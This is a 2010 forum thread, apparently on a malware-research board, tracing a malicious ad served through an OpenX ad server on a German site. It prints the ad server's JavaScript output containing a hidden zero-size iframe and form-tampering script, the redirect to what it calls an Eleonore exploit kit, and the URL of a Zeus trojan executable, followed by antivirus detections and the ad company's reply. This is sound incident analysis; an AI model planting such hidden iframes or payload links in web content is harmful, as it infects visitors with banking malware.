Author Topic: Ad directs to Zeus v2.0  (Read 14833 times)


April 22, 2010, 10:48:13 am

SysAdMini

We start at

Code:
www.msdosbefehle.de/anzeigen-von-meldungen-mit-einer-batch-datei-t79.html
There is an ad from adserver.ventaya.de.
Code:
<!-- Generated by OpenX 2.8.0 -->
<script type='text/javascript' src='http://adserver.ventaya.de/www/delivery/spcjs.php?id=1&amp;block=1&amp;blockcampaign=1'></script>

<!-- TradeDoubler site verification 1431179 -->


Code:
adserver.ventaya.de/www/delivery/spc.php?zones=1%7C2%7C3%7C4%7C5%7C6%7C7%7C8%7C9%7C10%7C11%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C21%7C22%7C23%7C24%7C25%7C27%7C28%7C29%7C30%7C31&source=&r=36928049&block=1&blockcampaign=1&charset=iso-8859-1&loc=http%3A//www.msdosbefehle.de/anzeigen-von-meldungen-mit-einer-batch-datei-t79.html
Let's look at the result:
Code:
var OA_output = new Array();
OA_output['1'] = '';
OA_output['1'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['1'] += "/* openads=http://adserver.ventaya.de/www/delivery bannerid=158 zoneid=1 source= */\n";
OA_output['1'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['1'] += "google_ad_client = \"pub-0440655336517328\";\n";
OA_output['1'] += "/* phpbb - 728x90 Image Anzeige unten horizontal */\n";
OA_output['1'] += "google_ad_slot = \"1125506879\";\n";
OA_output['1'] += "google_ad_width = 728;\n";
OA_output['1'] += "google_ad_height = 90;\n";
OA_output['1'] += "//-->\n";
OA_output['1'] += "<"+"/script>\n";
OA_output['1'] += "<"+"script type=\"text/javascript\"\n";
OA_output['1'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['1'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://adserver.ventaya.de/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_bf67ed0eda\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=158&amp;campaignid=35&amp;zoneid=1&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=bf67ed0eda\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"script type=\"text/javascript\">window.onload=function(){var aht=new Array();var aht=document.getElementsByTagName(\'*\');for(var i=0;i<"+"aht.length;i++){if(aht[i].name==\'append\'){aht[i].value=\'\';}if(aht[i].name==\'submitbutton\'){aht[i].onclick=function(){return false;}}}}<"+"/script>\n";
OA_output['1'] += "<"+"noscript><"+"style type=\"text/css\">.code{display:none;}<"+"/style><"+"/noscript>\n";
OA_output['1'] += "<"+"iframe src=\"http://trustandgoinc.com/in.cgi?default\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>\n";
OA_output['2'] = '';
OA_output['2'] += "<"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['2'] += "amazon_ad_tag = \"mezoitsyag-21\"; amazon_ad_width = \"120\"; amazon_ad_height = \"600\"; amazon_ad_logo = \"hide\"; amazon_ad_link_target = \"new\"; amazon_ad_border = \"hide\";//--><"+"/script>\n";
OA_output['2'] += "<"+"script type=\"text/javascript\" src=\"http://www.assoc-amazon.de/s/ads.js\"><"+"/script><"+"div id=\'beacon_883fb8a7b6\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=139&amp;campaignid=33&amp;zoneid=2&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=883fb8a7b6\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=1265__zoneid=3__cb=50cdb862fb__oadest=http%3A%2F%2Fwww1.belboon.de%2Fadtracking%2F02c3a50812d70189f7003671.html\' target=\'_blank\'>hier könnt ihr euch auch beim Chat anmelden<"+"/a><"+"div id=\'beacon_50cdb862fb\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=1265&amp;campaignid=251&amp;zoneid=3&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=50cdb862fb\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['4'] = '';
OA_output['4'] += "<"+"!-- BEGINN des zanox-affiliate HTML-Code -->\n";
OA_output['4'] += "<"+"!-- ( Der HTML-Code darf im Sinne der einwandfreien Funktionalität nicht verändert werden! ) -->\n";
OA_output['4'] += "<"+"a href=\"http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=811__zoneid=4__cb=06cecfedf5__oadest=http://www.zanox-affiliate.de/ppc/?12036356C715518984T\"  target=\"_blank\"><"+"img src=\"http://www.zanox-affiliate.de/ppv/?12036356C715518984\" align=\"bottom\" width=\"105\" height=\"80\" border=\"0\" hspace=\"1\" alt=\"Tchibo-Jede Woche eine neue Welt\"><"+"/a>\n";
OA_output['4'] += "<"+"!-- ENDE des zanox-affiliate HTML-Code --><"+"div id=\'beacon_06cecfedf5\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=811&amp;campaignid=189&amp;zoneid=4&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=06cecfedf5\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['5'] = '';
OA_output['5'] += "<"+"!-- BEGIN PARTNER PROGRAM - DO NOT CHANGE THE PARAMETERS OF THE HYPERLINK -->\n";
OA_output['5'] += "<"+"a href=\"http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=1255__zoneid=5__cb=47b157b27a__oadest=http://partners.webmasterplan.com/click.asp?ref=253585&site=4642&type=b9&bnb=9\"  target=\"_blank\">\n";
OA_output['5'] += "<"+"img src=\"http://banners.webmasterplan.com/view.asp?ref=253585&site=4642&b=9\" border=\"0\" alt=\"gutefrage.net - Die Ratgeber-Community\" width=\"88\" height=\"31\" /><"+"/a><"+"br />\n";
OA_output['5'] += "<"+"!-- END PARTNER PROGRAM --><"+"div id=\'beacon_47b157b27a\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=1255&amp;campaignid=250&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=47b157b27a\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['6'] = '';
OA_output['6'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=254__zoneid=6__cb=e075672e7b__oadest=http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fref%3D253585%26site%3D5680%26type%3Dtext%26tnb%3D3\' target=\'_blank\'>aktuelle Gratisartikel bei SCHLECKER<"+"/a><"+"div id=\'beacon_e075672e7b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=254&amp;campaignid=48&amp;zoneid=6&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=e075672e7b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['7'] = '';

OA_output['8'] = '';
OA_output['8'] += "<"+"!-- eBay RelevanceAd -->\n";
OA_output['8'] += "<"+"script language=\'JavaScript\' type=\'text/javascript\'>\n";
OA_output['8'] += "//<"+"-- DO NOT CHANGE -->\n";
OA_output['8'] += "// <"+"!--<"+"[CDATA[\n";
OA_output['8'] += "era_width = \'300\';\n";
OA_output['8'] += "era_height = \'250\';\n";
OA_output['8'] += "era_layout = \'mxd\';\n";
OA_output['8'] += "era_color_border = \'ECEFF2\';\n";
OA_output['8'] += "era_color_bg = \'ECEFF2\';\n";
OA_output['8'] += "era_color_text = \'434343\';\n";
OA_output['8'] += "era_color_title = \'000000\';\n";
OA_output['8'] += "era_color_link = \'434343\';\n";
OA_output['8'] += "era_itemtype = \'0\';\n";
OA_output['8'] += "era_publisher=\'253585\';\n";
OA_output['8'] += "// ]]> -->\n";
OA_output['8'] += "<"+"/script>\n";
OA_output['8'] += "<"+"script language=\'JavaScript\' type=\'text/javascript\' src=\'http://ebayrelevancead.webmasterplan.com/js/show_ads.js\'><"+"/script>\n";
OA_output['8'] += "<"+"!-- /eBay RelevanceAd --><"+"div id=\'beacon_714c171e7e\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=1238&amp;campaignid=4&amp;zoneid=8&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=714c171e7e\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['9'] = '';
OA_output['9'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=827__zoneid=9__cb=5d521bb68f__oadest=http%3A%2F%2Fad.zanox.com%2Fppc%2F%3F12025695C1672808792T\' target=\'_blank\'>wo seid ihr zur Schule gegangen?<"+"/a><"+"div id=\'beacon_5d521bb68f\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=827&amp;campaignid=191&amp;zoneid=9&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=5d521bb68f\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['10'] = '';
OA_output['10'] += "<"+"!-- BEGINN des zanox-affiliate HTML-Code -->\n";
OA_output['10'] += "<"+"!-- ( Der HTML-Code darf im Sinne der einwandfreien Funktionalität nicht verändert werden! ) -->\n";
OA_output['10'] += "<"+"a href=\"http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=773__zoneid=10__cb=4e7a5fe7e0__oadest=http://ad.zanox.com/ppc/?12963300C94908996T\"  target=\"_blank\"><"+"img src=\"http://ad.zanox.com/ppv/?12963300C94908996\" align=\"bottom\" width=\"120\" height=\"60\" border=\"0\" hspace=\"1\" alt=\"http://www.myvideo.de\"><"+"/a>\n";
OA_output['10'] += "<"+"!-- ENDE des zanox-affiliate HTML-Code --><"+"div id=\'beacon_4e7a5fe7e0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=773&amp;campaignid=182&amp;zoneid=10&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=4e7a5fe7e0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['11'] = '';

OA_output['12'] = '';
OA_output['12'] += "<"+"a href=\'http://adserver.ventaya.de/www/delivery/ck.php?oaparams=2__bannerid=71__zoneid=12__cb=6d67faef1c__oadest=http%3A%2F%2Fpartners.webmasterplan.com%2Fclick.asp%3Fref%3D253585%26site%3D3657%26type%3Dtext%26tnb%3D111\' target=\'_blank\'>Link zum neuen Quelle Sonderverkauf<"+"/a><"+"div id=\'beacon_6d67faef1c\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://adserver.ventaya.de/www/delivery/lg.php?bannerid=71&amp;campaignid=9&amp;zoneid=12&amp;loc=1&amp;referer=http%3A%2F%2Fwww.msdosbefehle.de%2Fanzeigen-von-meldungen-mit-einer-batch-datei-t79.html&amp;cb=6d67faef1c\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['13'] = '';

OA_output['14'] = '';

OA_output['15'] = '';

OA_output['16'] = '';

OA_output['17'] = '';

OA_output['18'] = '';
OA_output['18'] += "<"+"script type=\"text/javascript\">window.onload=function(){var aht=new Array();var aht=document.getElementsByTagName(\'*\');for(var i=0;i<"+"aht.length;i++){if(aht[i].name==\'append\'){aht[i].value=\'\';}if(aht[i].name==\'submitbutton\'){aht[i].onclick=function(){return false;}}}}<"+"/script>\n";
OA_output['18'] += "<"+"noscript><"+"style type=\"text/css\">.code{display:none;}<"+"/style><"+"/noscript>\n";
OA_output['18'] += "<"+"iframe src=\"http://trustandgoinc.com/in.cgi?default\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>\n";
OA_output['19'] = '';

OA_output['21'] = '';

OA_output['22'] = '';

OA_output['23'] = '';

OA_output['24'] = '';

OA_output['25'] = '';

OA_output['27'] = '';

OA_output['28'] = '';

OA_output['29'] = '';

OA_output['30'] = '';

OA_output['31'] = '';


It contains an iframe:
Code:
OA_output['1'] += "<"+"iframe src=\"http://trustandgoinc.com/in.cgi?default\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>\n";
which returns an iframe
Code:
<html><frameset rows="100%"><frame src="http://www.this-all-clean.com/yiruwe57324/"></frameset></html>

directing to an Eleonore exploit kit.

Payload of this kit is a Zeus v2.0 trojan.
Code:
www.this-all-clean.com/yiruwe57324/load/load.exe

http://www.virustotal.com/analisis/7d666abf0d867e7c7fe0ba26b7ef216af1591e92f04951fe06b37b74a114fb83-1271929389
Comodo    4663    2010.04.22    TrojWare.Win32.Trojan.Agent.Gen
F-Secure    9.0.15370.0    2010.04.22    Suspicious:W32/Malware!Gemini
McAfee-GW-Edition    6.8.5    2010.04.22    Heuristic.LooksLike.Trojan.Backdoor.Tofsee.H
NOD32    5049    2010.04.22    Win32/Spy.Zbot.YU
Panda    10.0.2.7    2010.04.21    Suspicious file
Symantec    20091.2.0.41    2010.04.22    Trojan.Zbot

http://camas.comodo.com/cgi-bin/submit?file=7d666abf0d867e7c7fe0ba26b7ef216af1591e92f04951fe06b37b74a114fb83
Ruining the bad guy's day

April 29, 2010, 08:41:55 am
Reply #1

ventaya

Hello,

thanks for sending us this malware alert. We checked our ad server and found the malware in the adscale.de advertising network. We have now removed this network.

Regards

Simon